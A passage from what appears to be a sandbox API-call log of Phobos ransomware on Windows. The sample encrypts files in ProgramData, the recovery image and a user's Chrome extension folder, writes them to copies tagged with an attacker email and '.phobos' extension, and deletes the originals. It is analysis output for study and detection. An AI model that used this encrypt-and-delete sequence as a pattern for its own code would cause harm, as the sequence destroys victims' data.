NT\\MSScan\\WelcomeScan.jpg" (normalized: "c:\\programdata\\microsoft\\windows nt\\msscan\\welcomescan.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.938] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0147.938] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log" (normalized: "c:\\programdata\\mozilla\\logs\\maintenanceservice-install.log"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0147.941] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=164) returned 1 [0147.941] CloseHandle (hObject=0x188) returned 1 [0147.942] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log" (normalized: "c:\\programdata\\mozilla\\logs\\maintenanceservice-install.log")) returned 0x2020 [0147.942] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\mozilla\\logs\\maintenanceservice-install.log.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0147.942] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log" (normalized: "c:\\programdata\\mozilla\\logs\\maintenanceservice-install.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0147.942] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0147.942] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0147.942] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\mozilla\\logs\\maintenanceservice-install.log.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0147.942] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d68) returned 1 [0147.942] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0147.942] ReadFile (in: hFile=0x188, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xa4, lpOverlapped=0x0) returned 1 [0147.943] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb0, dwBufLen=0xb0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb0) returned 1 [0147.943] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xb0, lpOverlapped=0x0) returned 1 [0147.944] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32968) returned 1 [0147.944] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0147.944] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60, dwBufLen=0x60 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60) returned 1 [0147.944] CryptDestroyKey (hKey=0xa32968) returned 1 [0147.944] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x112, lpOverlapped=0x0) returned 1 [0147.944] CryptDestroyKey (hKey=0xa32d68) returned 1 [0147.944] CloseHandle (hObject=0x188) returned 1 [0147.945] CloseHandle (hObject=0x138) returned 1 [0147.948] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log" (normalized: "c:\\programdata\\mozilla\\logs\\maintenanceservice-install.log")) returned 1 [0147.949] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0147.949] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml" (normalized: "c:\\programdata\\sun\\java\\java update\\jaureglist.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0147.950] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=119) returned 1 [0147.950] CloseHandle (hObject=0x138) returned 1 [0147.950] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml" (normalized: "c:\\programdata\\sun\\java\\java update\\jaureglist.xml")) returned 0x2020 [0147.950] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\sun\\java\\java update\\jaureglist.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0147.950] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml" (normalized: "c:\\programdata\\sun\\java\\java update\\jaureglist.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0147.950] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0147.950] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0147.950] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\sun\\java\\java update\\jaureglist.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0147.951] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d68) returned 1 [0147.951] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0147.951] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x77, lpOverlapped=0x0) returned 1 [0147.952] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x80, dwBufLen=0x80 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x80) returned 1 [0147.952] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x80, lpOverlapped=0x0) returned 1 [0147.952] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32968) returned 1 [0147.952] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0147.952] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0147.952] CryptDestroyKey (hKey=0xa32968) returned 1 [0147.952] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0147.953] CryptDestroyKey (hKey=0xa32d68) returned 1 [0147.953] CloseHandle (hObject=0x138) returned 1 [0147.953] CloseHandle (hObject=0x188) returned 1 [0147.954] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml" (normalized: "c:\\programdata\\sun\\java\\java update\\jaureglist.xml")) returned 1 [0147.955] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0147.955] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0147.956] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=169213970) returned 1 [0147.956] CloseHandle (hObject=0x188) returned 1 [0147.957] GetFileAttributesW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim")) returned 0x2006 [0147.957] MoveFileW (lpExistingFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim"), lpNewFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0147.957] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0147.957] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc40 | out: lpNewFilePointer=0x0) returned 1 [0147.957] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc40 | out: lpNewFilePointer=0x0) returned 1 [0147.957] ReadFile (in: hFile=0x188, lpBuffer=0x34b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2f4fc4c, lpOverlapped=0x0 | out: lpBuffer=0x34b0058*, lpNumberOfBytesRead=0x2f4fc4c*=0x40000, lpOverlapped=0x0) returned 1 [0148.041] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x35caab0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc40 | out: lpNewFilePointer=0x0) returned 1 [0148.041] ReadFile (in: hFile=0x188, lpBuffer=0x34f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2f4fc4c, lpOverlapped=0x0 | out: lpBuffer=0x34f0058*, lpNumberOfBytesRead=0x2f4fc4c*=0x40000, lpOverlapped=0x0) returned 1 [0148.076] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xa120012, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc40 | out: lpNewFilePointer=0x0) returned 1 [0148.076] ReadFile (in: hFile=0x188, lpBuffer=0x3530058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2f4fc4c, lpOverlapped=0x0 | out: lpBuffer=0x3530058*, lpNumberOfBytesRead=0x2f4fc4c*=0x40000, lpOverlapped=0x0) returned 1 [0148.154] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc30, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc9c | out: phKey=0x2f4fc9c*=0xa327e8) returned 1 [0148.154] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.155] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc50*=0xc0050, dwBufLen=0xc0050 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc50*=0xc0050) returned 1 [0148.161] CryptDestroyKey (hKey=0xa327e8) returned 1 [0148.161] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc78 | out: lpNewFilePointer=0x0) returned 1 [0148.161] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2f4fc88, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc88*=0xc0102, lpOverlapped=0x0) returned 1 [0148.180] SetEndOfFile (hFile=0x188) returned 1 [0148.181] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xa120012, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc48 | out: lpNewFilePointer=0x0) returned 1 [0148.181] WriteFile (in: hFile=0x188, lpBuffer=0x357013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2f4fc54, lpOverlapped=0x0 | out: lpBuffer=0x357013a*, lpNumberOfBytesWritten=0x2f4fc54*=0x40000, lpOverlapped=0x0) returned 1 [0148.183] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x35caab0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc48 | out: lpNewFilePointer=0x0) returned 1 [0148.183] WriteFile (in: hFile=0x188, lpBuffer=0x357013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2f4fc54, lpOverlapped=0x0 | out: lpBuffer=0x357013a*, lpNumberOfBytesWritten=0x2f4fc54*=0x40000, lpOverlapped=0x0) returned 1 [0148.186] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc48 | out: lpNewFilePointer=0x0) returned 1 [0148.186] WriteFile (in: hFile=0x188, lpBuffer=0x357013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2f4fc54, lpOverlapped=0x0 | out: lpBuffer=0x357013a*, lpNumberOfBytesWritten=0x2f4fc54*=0x40000, lpOverlapped=0x0) returned 1 [0148.187] CloseHandle (hObject=0x188) returned 1 [0148.187] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0148.187] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.187] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=160) returned 1 [0148.187] CloseHandle (hObject=0x188) returned 1 [0148.187] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png")) returned 0x2020 [0148.187] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.188] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.188] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.188] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.188] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.188] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0148.188] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.188] ReadFile (in: hFile=0x188, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xa0, lpOverlapped=0x0) returned 1 [0148.189] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb0, dwBufLen=0xb0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb0) returned 1 [0148.189] WriteFile (in: hFile=0x148, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xb0, lpOverlapped=0x0) returned 1 [0148.190] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0148.190] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.190] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0148.190] CryptDestroyKey (hKey=0xa32da8) returned 1 [0148.190] WriteFile (in: hFile=0x148, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0148.190] CryptDestroyKey (hKey=0xa327e8) returned 1 [0148.190] CloseHandle (hObject=0x188) returned 1 [0148.190] CloseHandle (hObject=0x148) returned 1 [0148.190] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png")) returned 1 [0148.191] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0148.191] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.192] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=92) returned 1 [0148.192] CloseHandle (hObject=0x148) returned 1 [0148.192] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html")) returned 0x2020 [0148.192] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.192] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.192] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.192] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.192] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.193] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0148.193] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.193] ReadFile (in: hFile=0x148, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x5c, lpOverlapped=0x0) returned 1 [0148.194] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60, dwBufLen=0x60 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60) returned 1 [0148.194] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x60, lpOverlapped=0x0) returned 1 [0148.195] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0148.195] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.195] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0148.195] CryptDestroyKey (hKey=0xa32da8) returned 1 [0148.195] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, 